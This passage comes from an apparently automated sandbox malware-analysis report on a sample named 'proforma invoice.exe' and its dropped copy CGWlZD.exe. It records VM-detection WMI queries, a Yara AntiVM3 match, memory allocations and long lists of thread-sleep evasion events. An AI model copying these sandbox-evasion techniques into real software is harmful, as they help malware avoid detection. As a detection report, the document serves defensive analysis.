Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: proforma invoice.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CGWlZD.exe PID: 7140, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\proforma invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 4DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 5DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 5F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 6F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: A220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: B220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: B6B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 15B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Memory allocated: 3070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 1540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 33F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 32F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 5930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 6930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 6A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 7A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: A5F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: B5F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: BA80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 1210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Memory allocated: 2B40000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4645	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6835	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Window / User API: threadDelayed 3622	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Window / User API: threadDelayed 6210	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Window / User API: threadDelayed 8315
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	Window / User API: threadDelayed 1538

Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7872	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 888	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 6348	Thread sleep count: 3622 > 30	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 6348	Thread sleep count: 6210 > 30	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98467s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -98016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -97063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -96032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -95063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -94954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -94829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -94704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -94579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -94454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -94329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe TID: 7740	Thread sleep time: -94204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 7772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99874s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 1048	Thread sleep count: 8315 > 30
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 1048	Thread sleep count: 1538 > 30
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99546s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99432s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99202s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -99093s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98873s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98656s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98546s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98437s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98327s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98209s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -98078s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97968s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97640s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97528s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97421s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97312s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97203s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -97093s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96975s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96859s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96749s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96640s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96531s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96421s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96312s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96203s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -96093s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95984s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95874s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95765s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95656s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95546s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95410s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95281s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95171s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -95062s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -94953s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -94843s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -94732s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -94624s >= -30000s
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe TID: 604	Thread sleep time: -94514s >= -30000s

Source: C:\Users\user\Desktop\proforma invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\proforma invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\CGWlZD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98813	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98688	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98577	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98467	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98250	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98141	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 98016	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97907	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97782	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97657	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97547	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97438	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97313	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97188	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 97063	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96938	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96719	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96594	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice.exe	Thread delayed: delay time: 96484	Jump to behavior
